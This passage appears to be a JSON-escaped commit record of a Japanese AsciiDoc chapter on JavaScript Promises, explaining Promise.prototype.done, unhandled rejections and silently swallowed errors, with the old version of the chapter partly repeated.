chain\u306e\u6700\u5f8c\u306b\u306a\u308b\u30e1\u30bd\u30c3\u30c9\u3068\u3044\u3046\u306e\u306f\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u307e\u305f\u3001Promise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308b\u3068\u7d39\u4ecb\u3057\u3066\u3044\u307e\u3057\u305f\u304c\u3001\n`done` \u306e\u4e2d\u3067\u306f\u305d\u306e\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u30ef\u30b6\u3068\u7a81\u304d\u629c\u3051\u3066\u4f8b\u5916\u3092\u51fa\u3059\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u4f55\u6545\u3053\u306e\u3088\u3046\u306aPromise\u306e\u6a5f\u80fd\u3068\u306f\u76f8\u53cd\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u306f\n\u6b21\u306e\u3088\u3046\u306aPromise\u306e\u5931\u6557\u4f8b\u3092\u898b\u3066\u3044\u304f\u3068\u5206\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n=== \u6c88\u9ed9\u3057\u305f\u30a8\u30e9\u30fc\n\nPromise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u304c\u3001\n(\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u304c\u4e0a\u624b\u304f\u50cd\u304b\u306a\u3044\u5834\u5408\u306b)\n\u3053\u306e\u6a5f\u80fd\u304c\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u3088\u308a\u8907\u96d1\u306a\u3082\u306e\u306b\u3057\u3066\u3057\u307e\u3046\u4e00\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306f\u3001<<then-or-catch,then or catch?>>\u3067\u3082\u540c\u69d8\u306e\u5185\u5bb9\u304c\u51fa\u3066\u304d\u305f\u3053\u3068\u3092\u899a\u3048\u3066\u3044\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u6b21\u306e\u3088\u3046\u306a\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3092\u8003\u3048\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[json-promise.js]]\n.json-promise.js\n----\ninclude::embed\/embed-json-promise.js[]\n----\n\n\u6e21\u3055\u308c\u305f\u5024\u3092`JSON.parse`\u3057\u3066promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3067\u3059\u306d\u3002\n\n\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u4f7f\u3046\u3053\u3068\u304c\u3067\u304d\u3001`JSON.parse`\u306f\u30d1\u30fc\u30b9\u306b\u5931\u6557\u3059\u308b\u3068\u4f8b\u5916\u3092\u6295\u3052\u308b\u306e\u3067\u3001\n\u305d\u308c\u3092`catch`\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u307e\u3059\u3002\n\n[source,js]\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}).catch(function(error){\n \/\/ => JSON.parse\u3067\u4f8b\u5916\u304c\u767a\u751f\u3057\u305f\u6642\n});\n----\n\n\u3061\u3083\u3093\u3068`catch`\u3057\u3066\u3044\u308c\u3070\u4f55\u3082\u554f\u984c\u304c\u306a\u3044\u306e\u3067\u3059\u304c\u3001\u305d\u306e\u51e6\u7406\u3092\u5fd8\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u30df\u30b9\u3092\n\u3057\u305f\u6642\u306b\u3069\u3053\u3067\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3057\u3066\u308b\u306e\u304b\u308f\u304b\u3089\u306a\u304f\u306a\u308b\u3068\u3044\u3046\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u52a9\u9577\u3055\u305b\u308b\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n[source,js]\n.catch\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u5fd8\u308c\u3066\u3057\u307e\u3063\u305f\u5834\u5408\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}); \/\/ <1>\n----\n<1> \u4f8b\u5916\u304c\u6295\u3052\u3089\u308c\u3066\u3082\u4f55\u3082\u51e6\u7406\u3055\u308c\u306a\u3044\n\n`JSON.parse`\u306e\u3088\u3046\u306a\u5206\u304b\u308a\u3084\u3059\u3044\u4f8b\u306e\u5834\u5408\u306f\u307e\u3060\u826f\u3044\u3067\u3059\u304c\u3001\n\u30e1\u30bd\u30c3\u30c9\u3092typo\u3057\u305f\u3053\u3068\u306b\u3088\u308bSyntax Error\u306a\u3069\u306f\u3088\u308a\u6df1\u523b\u306a\u554f\u984c\u3068\u306a\u308a\u3084\u3059\u3044\u3067\u3059\u3002\n\n[source,js]\n.typo\u306b\u3088\u308b\u30a8\u30e9\u30fc\n----\nvar string = \"{}\";\nJSONPromise(string).then(function (object) {\n conosle.log(object);\/\/ <1>\n});\n----\n<1> conosle \u3068\u3044\u3046typo\u304c\u3042\u308b\n\n\u3053\u306e\u5834\u5408\u306f\u3001`console`\u3092`conosle`\u3068typo\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3059\u308b\u306f\u305a\u3067\u3059\u3002\n\n> ReferenceError: conosle is not defined\n\n\u3057\u304b\u3057\u3001Promise\u3067\u306ftry-catch\u3055\u308c\u308b\u305f\u3081\u3001\u30a8\u30e9\u30fc\u304c\u63e1\u308a\u3064\u3076\u3055\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u73fe\u8c61\u304c\u767a\u751f\u3057\u3084\u3059\u304f\u306a\u308a\u307e\u3059\u3002\n\u6bce\u56de\u3001\u6b63\u3057\u304f`catch`\u306e\u51e6\u7406\u3092\u66f8\u304f\u3053\u3068\u304c\u51fa\u6765\u308b\u5834\u5408\u306f\u4f55\u3082\u554f\u984c\u3042\u308a\u307e\u305b\u3093\u304c\u3001\nPromise\u306e\u5b9f\u88c5\u306b\u3088\u3063\u3066\u306f\u3053\u306e\u3088\u3046\u306a\u30df\u30b9\u304c\u691c\u77e5\u3057\u306b\u304f\u304f\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u3053\u3068\u3092\u77e5\u3063\u3066\u304a\u304f\u3079\u304d\u3067\u3057\u3087\u3046\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u306f__unhandled rejection__\u3068\u8a00\u308f\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\nRejected\u3055\u308c\u305f\u6642\u306e\u51e6\u7406\u304c\u306a\u3044\u3068\u3044\u3046\u305d\u306e\u307e\u307e\u306e\u610f\u5473\u3067\u3059\u306d\u3002\n\n[NOTE]\n====\n\u3053\u306eunhandled rejection\u304c\u691c\u77e5\u3057\u306b\u304f\u3044\u554f\u984c\u306fPromise\u306e\u5b9f\u88c5\u306b\u4f9d\u5b58\u3057\u307e\u3059\u3002\n\u4f8b\u3048\u3070\u3001 https:\/\/github.com\/yahoo\/ypromise[ypromise] \u306funhandled rejection\u304c\u3042\u308b\u5834\u5408\u306f\u3001\u305d\u306e\u4e8b\u3092\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u8868\u793a\u3057\u307e\u3059\u3002\n\n> Promise rejected but no error handlers were registered to it\n\n\u307e\u305f\u3001 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u306e\u5834\u5408\u3082\u3001\n\u660e\u3089\u304b\u306b\u4eba\u9593\u306e\u30df\u30b9\u306b\u307f\u3048\u308bReferenceError\u306e\u5834\u5408\u306a\u3069\u306f\u305d\u306e\u307e\u307e\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u30a8\u30e9\u30fc\u3092\u8868\u793a\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n\n> \"Possibly unhandled ReferenceError. conosle is not defined\n\n\u30cd\u30a4\u30c6\u30a3\u30d6\u306ePromise\u306e\u5834\u5408\u3082\u540c\u69d8\u306b\u3053\u306e\u554f\u984c\u3078\u306e\u5bfe\u51e6\u3068\u3057\u3066GC-based unhandled rejection tracking\u3068\u3044\u3046\u3082\u306e\u304c\n\u642d\u8f09\u3055\u308c\u3064\u3064\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u30ac\u30fc\u30d9\u30c3\u30b8\u30b3\u30ec\u30af\u30b7\u30e7\u30f3\u306b\u3088\u3063\u3066\u56de\u53ce\u3055\u308c\u308b\u3068\u304d\u306b\u3001\n\u305d\u308c\u304cunhandled rejection\u3067\u3042\u308b\u306a\u3089\u3001\u30a8\u30e9\u30fc\u8868\u793a\u3092\u3059\u308b\u3068\u3044\u3046\u4ed5\u7d44\u307f\u304c\u30d9\u30fc\u30b9\u3068\u306a\u3063\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\n\nhttps:\/\/twitter.com\/domenic\/status\/461154989856264192[Firefox] \u3084 https:\/\/code.google.com\/p\/v8\/issues\/detail?id=3093[Chrome] \u306e\u30cd\u30a4\u30c6\u30a3\u30d6Promise\u3067\u306f\u4e00\u90e8\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n====\n\n=== done\u306e\u5b9f\u88c5\n\nPromise\u306b\u304a\u3051\u308b `done` \u306f\u5148\u7a0b\u306e\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u3092\u907f\u3051\u308b\u306b\u306f\u3069\u3046\u3059\u308b\u304b\u3068\u3044\u3046\u65b9\u6cd5\u8ad6\u3068\u3057\u3066\u3001\n\u305d\u3082\u305d\u3082\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u3057\u306a\u3051\u308c\u3070\u3044\u3044 \u3068\u3044\u3046\u8c6a\u5feb\u306a\u89e3\u6c7a\u65b9\u6cd5\u3092\u63d0\u4f9b\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u3067\u3059\u3002\n\n`done`\u306fPromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u308b\u306e\u3067\u3001\n`Promise.prototype.done`\u3068\u3044\u3046Promise\u306eprototype\u62e1\u5f35\u3068\u3057\u3066\u5b9f\u88c5\u3057\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[promise-prototype-done.js]]\n.promise-prototype-done.js\n----\ninclude::lib\/promise-prototype-done.js[]\n----\n\nsetTimeout\u306e\u4e2d\u3067throw\u3092\u3059\u308b\u3053\u3068\u3067\u3001\u5916\u3078\u305d\u306e\u307e\u307e\u4f8b\u5916\u3092\u6295\u3052\u308b\u3053\u3068\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\n\n[source,js]\n.setTimeout\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u5185\u3067\u306e\u4f8b\u5916\n----\ntry{\n setTimeout(function callback() {\n throw new Error(\"error\");\/\/ <1>\n }, 0);\n}catch(error){\n console.error(error);\n}\n----\n<1> \u3053\u306e\u4f8b\u5916\u306f\u30ad\u30e3\u30c3\u30c1\u3059\u308b\u3053\u3068\u51fa\u6765\u306a\u3044\n\n[NOTE]\n====\n\u306a\u305c\u975e\u540c\u671f\u306e`callback`\u5185\u3067\u306e\u4f8b\u5916\u3092\u30ad\u30e3\u30c3\u30c1\u51fa\u6765\u306a\u3044\u306e\u304b\u306f\u4ee5\u4e0b\u304c\u53c2\u8003\u306a\u308a\u307e\u3059\u3002\n\n- http:\/\/techblog.yahoo.co.jp\/programming\/javascript_error\/[JavaScript\u3068\u975e\u540c\u671f\u306e\u30a8\u30e9\u30fc\u51e6\u7406 - Yahoo! JAPAN Tech Blog]\n====\n\n<<promise-prototype-done.js,`Promise.prototype.done`>> \u3092\u3088\u304f\u898b\u3066\u307f\u308b\u3068\u3001\u4f55\u3082`return`\u3057\u3066\u3044\u306a\u3044\u3053\u3068\u3082\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\u3064\u307e\u308a\u3001`done`\u306f\u300c\u3053\u3053\u3067Promise chain\u306f\u7d42\u4e86\u3057\u3066\u3001\u4f8b\u5916\u304c\u8d77\u304d\u305f\u5834\u5408\u306f\u305d\u306e\u307e\u307epromise\u306e\u5916\u3078\u6295\u3052\u76f4\u3059\u300d\u3068\u3044\u3046\u51e6\u7406\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u5b9f\u88c5\u3084\u74b0\u5883\u304c\u3057\u3063\u304b\u308a\u5bfe\u5fdc\u3057\u3066\u3044\u308c\u3070\u3001__unhandled rejection__\u306e\u691c\u77e5\u306f\u3067\u304d\u308b\u305f\u3081\u3001\u5fc5\u305a\u3057\u3082`done`\u304c\u5fc5\u8981\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u304f\u3001\n\u307e\u305f\u4eca\u56de\u306e<<promise-prototype-done.js,`Promise.prototype.done`>>\u306e\u3088\u3046\u306b\u3001`done`\u306f\u65e2\u5b58\u306ePromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u305f\u3081\u3001\n<<es6-promises,ES6 Promises>>\u306e\u4ed5\u69d8\u305d\u306e\u3082\u306e\u306b\u306f\u5165\u3089\u306a\u304b\u3063\u305f\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n[NOTE]\n\u4eca\u56de\u306e`Promise.prototype.done`\u306e\u5b9f\u88c5\u306f https:\/\/www.promisejs.org\/[promisejs.org] \u3092\u53c2\u8003\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n\n=== \u307e\u3068\u3081\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001 https:\/\/github.com\/kriskowal\/q\/wiki\/API-Reference#promisedoneonfulfilled-onrejected-onprogress[Q] \u3084 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u3084 https:\/\/github.com\/cscott\/prfun#promisedone--undefined[prfun] \u7b49\n\u591a\u304f\u306ePromise\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b`done`\u306e\u57fa\u790e\u7684\u306a\u5b9f\u88c5\u3068\u3001`then`\u3068\u306f\u3069\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3073\u307e\u3057\u305f\u3002\n\n`done`\u306b\u306f2\u3064\u306e\u5074\u9762\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\n\n* `done`\u306e\u4e2d\u3067\u8d77\u304d\u305f\u30a8\u30e9\u30fc\u306f\u5916\u3078\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u76f4\u3059\n* Promise chain \u3092\u7d42\u4e86\u3059\u308b\u3068\u3044\u3046\u5ba3\u8a00\n\n<<then-or-catch,then or catch?>> \u3068\u540c\u69d8\u306bPromise\u306b\u3088\u308a\u6c88\u9ed9\u3057\u3066\u3057\u307e\u3063\u305f\u30a8\u30e9\u30fc\u306b\u3064\u3044\u3066\u306f\u3001\n\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u3084\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u6539\u5584\u7b49\u3067\u6b86\u3069\u306e\u30b1\u30fc\u30b9\u3067\u306f\u554f\u984c\u3067\u306f\u306a\u304f\u306a\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u307e\u305f\u3001`done`\u306f\u5024\u3092\u8fd4\u3055\u306a\u3044\u4e8b\u3067\u305d\u308c\u4ee5\u4e0aPromise chain\u3092\u7e4b\u3052\u308b\u4e8b\u304c\u3067\u304d\u306a\u304f\u306a\u308b\u305f\u3081\u3001\n\u305d\u306e\u3088\u3046\u306a\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u7528\u9014\u3067`done`\u3092\u4f7f\u3046\u3053\u3068\u3082\u51fa\u6765\u307e\u3059\u3002\n\n<<es6-promises,ES6 Promises>> \u3067\u306f\u6839\u672c\u306b\u7528\u610f\u3055\u308c\u3066\u308b\u6a5f\u80fd\u306f\u3042\u307e\u308a\u591a\u304f\u3042\u308a\u307e\u305b\u3093\u3002\n\u305d\u306e\u305f\u3081\u3001\u81ea\u3089\u62e1\u5f35\u3057\u305f\u308a\u3001\u62e1\u5f35\u3057\u305f\u30e9\u30a4\u30d6\u30e9\u30ea\u7b49\u3092\u5229\u7528\u3059\u308b\u30b1\u30fc\u30b9\u304c\u591a\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u305d\u306e\u6642\u3067\u3082\u4f55\u3067\u3082\u3084\u308a\u904e\u304e\u308b\u3068\u3001\u305b\u3063\u304b\u304f\u975e\u540c\u671f\u51e6\u7406\u3092Promise\u3067\u307e\u3068\u3081\u3066\u3082\u8907\u96d1\u5316\u3057\u3066\u3057\u307e\u3046\u5834\u5408\u304c\u3042\u308b\u305f\u3081\u3001\n\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u306e\u306f\u62bd\u8c61\u7684\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3067\u3042\u308bPromise\u306b\u304a\u3044\u3066\u306f\u5927\u4e8b\u306a\u90e8\u5206\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n","old_contents":"[[promise-done]]\n== Promise.prototype.done \u3068\u306f\u4f55\u304b?\n\n\u65e2\u5b58\u306ePromise\u5b9f\u88c5\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u305f\u3053\u3068\u304c\u3042\u308b\u4eba\u306f\u3001\n`then` \u306e\u4ee3\u308f\u308a\u306b\u4f7f\u3046 `done` \u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u898b\u305f\u3053\u3068\u304c\u3042\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u305d\u308c\u3089\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u306f `Promise.prototype.done` \u3068\u3044\u3046\u3088\u3046\u306a\u5b9f\u88c5\u304c\u5b58\u5728\u3057\u3001\n\u4f7f\u3044\u65b9\u306f`then`\u3068\u540c\u3058\u3067\u3059\u304c\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n`Promise.prototype.done` \u306f\u3001<<es6-promises,ES6 Promises>>\u3084<<promises-aplus,Promises\/A+>>\u306e\u4ed5\u69d8\u306b\u306f\n\u5b58\u5728\u3057\u3066\u3044\u306a\u3044\u8a18\u8ff0\u3067\u3059\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u304c\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059\u3002\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001`Promise.prototype.done`\u3068\u306f\u4f55\u304b?\n\u307e\u305f\u4f55\u6545\u3053\u306e\u3088\u3046\u306a\u30e1\u30bd\u30c3\u30c9\u304c\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002\n\n=== done\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u4f8b\n\n\u5b9f\u969b\u306bdone\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u308b\u3068`done`\u306e\u6319\u52d5\u304c\u5206\u304b\u308a\u3084\u3059\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[promise-done-example.js]]\n.promise-done-example.js\n----\ninclude::embed\/embed-promise-done-example.js[]\n----\n\n\u6700\u521d\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001`Promise.prototype.done`\u306f\u4ed5\u69d8\u3068\u3057\u3066\u306f\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\n\u5229\u7528\u3059\u308b\u969b\u306f\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3046\u304b\u81ea\u5206\u3067\u5b9f\u88c5\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u5b9f\u88c5\u306b\u3064\u3044\u3066\u306f\u5f8c\u3067\u89e3\u8aac\u3057\u307e\u3059\u304c\u3001\u307e\u305a\u306f`then`\u3092\u4f7f\u3063\u305f\u5834\u5408\u3068`done`\u3092\u4f7f\u3063\u305f\u3082\u306e\u3092\u6bd4\u8f03\u3057\u3066\u307f\u307e\u3059\u3002\n\n[source,js]\n.then\u3092\u4f7f\u3063\u305f\u5834\u5408\n----\nvar promise = Promise.resolve();\npromise.then(function () {\n JSON.parse(\"this is not json\");\n}).catch(function (error) {\n console.error(error);\/\/ => \"SyntaxError: JSON.parse: unexpected keyword at line 1 column 1 of the JSON data\"\n});\n----\n\n\n\u6bd4\u3079\u3066\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\n\n* `done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\n** \u3064\u307e\u308a\u3001done\u306e\u5f8c\u306b`catch`\u7b49\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u306f\u3067\u304d\u306a\u3044\n* `done` \u306e\u4e2d\u3067\u767a\u751f\u3057\u305f\u30a8\u30e9\u30fc\u306f\u305d\u306e\u307e\u307e\u5916\u306b\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u3089\u308c\u308b\n** \u3064\u307e\u308a\u3001Promise\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u884c\u308f\u308c\u306a\u3044\n\n`done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u306a\u3044\u306e\u3067\u3001\nPromise chain\u306e\u6700\u5f8c\u306b\u306a\u308b\u30e1\u30bd\u30c3\u30c9\u3068\u3044\u3046\u306e\u306f\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u307e\u305f\u3001Promise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308b\u3068\u7d39\u4ecb\u3057\u3066\u3044\u307e\u3057\u305f\u304c\u3001\n`done` \u306e\u4e2d\u3067\u306f\u305d\u306e\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u30ef\u30b6\u3068\u7a81\u304d\u629c\u3051\u3066\u4f8b\u5916\u3092\u51fa\u3059\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u4f55\u6545\u3053\u306e\u3088\u3046\u306aPromise\u306e\u6a5f\u80fd\u3068\u306f\u76f8\u53cd\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u306f\n\u6b21\u306e\u3088\u3046\u306aPromise\u306e\u5931\u6557\u4f8b\u3092\u898b\u3066\u3044\u304f\u3068\u5206\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n=== \u6c88\u9ed9\u3057\u305f\u30a8\u30e9\u30fc\n\nPromise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u304c\u3001\n(\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u304c\u4e0a\u624b\u304f\u50cd\u304b\u306a\u3044\u5834\u5408\u306b)\n\u3053\u306e\u6a5f\u80fd\u304c\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u3088\u308a\u8907\u96d1\u306a\u3082\u306e\u306b\u3057\u3066\u3057\u307e\u3046\u4e00\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306f\u3001<<then-or-catch,then or catch?>>\u3067\u3082\u540c\u69d8\u306e\u5185\u5bb9\u304c\u51fa\u3066\u304d\u305f\u3053\u3068\u3092\u899a\u3048\u3066\u3044\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u6b21\u306e\u3088\u3046\u306a\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3092\u8003\u3048\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[json-promise.js]]\n.json-promise.js\n----\ninclude::embed\/embed-json-promise.js[]\n----\n\n\u6e21\u3055\u308c\u305f\u5024\u3092`JSON.parse`\u3057\u3066promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3067\u3059\u306d\u3002\n\n\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u4f7f\u3046\u3053\u3068\u304c\u3067\u304d\u3001`JSON.parse`\u306f\u30d1\u30fc\u30b9\u306b\u5931\u6557\u3059\u308b\u3068\u4f8b\u5916\u3092\u6295\u3052\u308b\u306e\u3067\u3001\n\u305d\u308c\u3092`catch`\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u307e\u3059\u3002\n\n[source,js]\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}).catch(function(error){\n \/\/ => JSON.parse\u3067\u4f8b\u5916\u304c\u767a\u751f\u3057\u305f\u6642\n});\n----\n\n\u3061\u3083\u3093\u3068`catch`\u3057\u3066\u3044\u308c\u3070\u4f55\u3082\u554f\u984c\u304c\u306a\u3044\u306e\u3067\u3059\u304c\u3001\u305d\u306e\u51e6\u7406\u3092\u5fd8\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u30df\u30b9\u3092\n\u3057\u305f\u6642\u306b\u3069\u3053\u3067\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3057\u3066\u308b\u306e\u304b\u308f\u304b\u3089\u306a\u304f\u306a\u308b\u3068\u3044\u3046\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u52a9\u9577\u3055\u305b\u308b\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n[source,js]\n.catch\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u5fd8\u308c\u3066\u3057\u307e\u3063\u305f\u5834\u5408\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}); \/\/ <1>\n----\n<1> \u4f8b\u5916\u304c\u6295\u3052\u3089\u308c\u3066\u3082\u4f55\u3082\u51e6\u7406\u3055\u308c\u306a\u3044\n\n`JSON.parse`\u306e\u3088\u3046\u306a\u5206\u304b\u308a\u3084\u3059\u3044\u4f8b\u306e\u5834\u5408\u306f\u307e\u3060\u826f\u3044\u3067\u3059\u304c\u3001\n\u30e1\u30bd\u30c3\u30c9\u3092typo\u3057\u305f\u3053\u3068\u306b\u3088\u308bSyntax Error\u306a\u3069\u306f\u3088\u308a\u6df1\u523b\u306a\u554f\u984c\u3068\u306a\u308a\u3084\u3059\u3044\u3067\u3059\u3002\n\n[source,js]\n.typo\u306b\u3088\u308b\u30a8\u30e9\u30fc\n----\nvar string = \"{}\";\nJSONPromise(string).then(function (object) {\n conosle.log(object);\/\/ <1>\n});\n----\n<1> conosle 